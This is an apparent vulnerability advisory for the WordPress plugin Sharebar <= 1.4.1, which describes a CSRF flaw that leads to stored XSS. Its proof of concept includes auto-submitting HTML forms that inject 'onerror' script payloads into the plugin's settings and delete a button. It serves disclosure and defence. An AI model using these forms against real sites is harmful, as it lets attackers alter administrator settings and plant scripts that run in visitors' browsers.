WordPress Plugin Vulnerabilities
Sharebar <= 1.4.1 - Arbitrary Settings Update to Stored XSS via CSRF
Description
The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack and also lead to Stored Cross-Site Scripting issue due to the lack of sanitisation and escaping in some of them
Proof of Concept
<form id="test" action="https://example.com/wp-admin/options-general.php?page=Sharebar" method="POST">
<input type="text" name="name" value="facebook">
<input type="text" name="position" value="1">
<input type="text" name="enabled" value="0">
<input type="text" name="enabled" value="1">
<input type="text" name="big" value="<a>test1</a><img src=x onerror=alert(/XSS/)>">
<input type="text" name="small" value="<a>test2</a><img src=x onerror=alert(/XSS/)>">
<input type="text" name="do" value="update">
<input type="text" name="id" value="1">
<input type="text" name="status" value="Share button has been updated.">
</form>
<script>
document.getElementById("test").submit();
</script>
<form id="test" action="https://example.com/wp-admin/options-general.php?page=Sharebar" method="POST">
<input type="text" name="do" value="delete">
<input type="text" name="id" value="5">
<input type="text" name="status" value="Button has been deleted.">
</form>
<script>
document.getElementById("test").submit();
</script> Affects Plugins
No known fix - plugin closed
References
Classification
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
Timeline
Publicly Published
2022-06-15 (about 7 months ago)
Added
2022-06-15 (about 7 months ago)
Last Updated
2022-06-15 (about 7 months ago)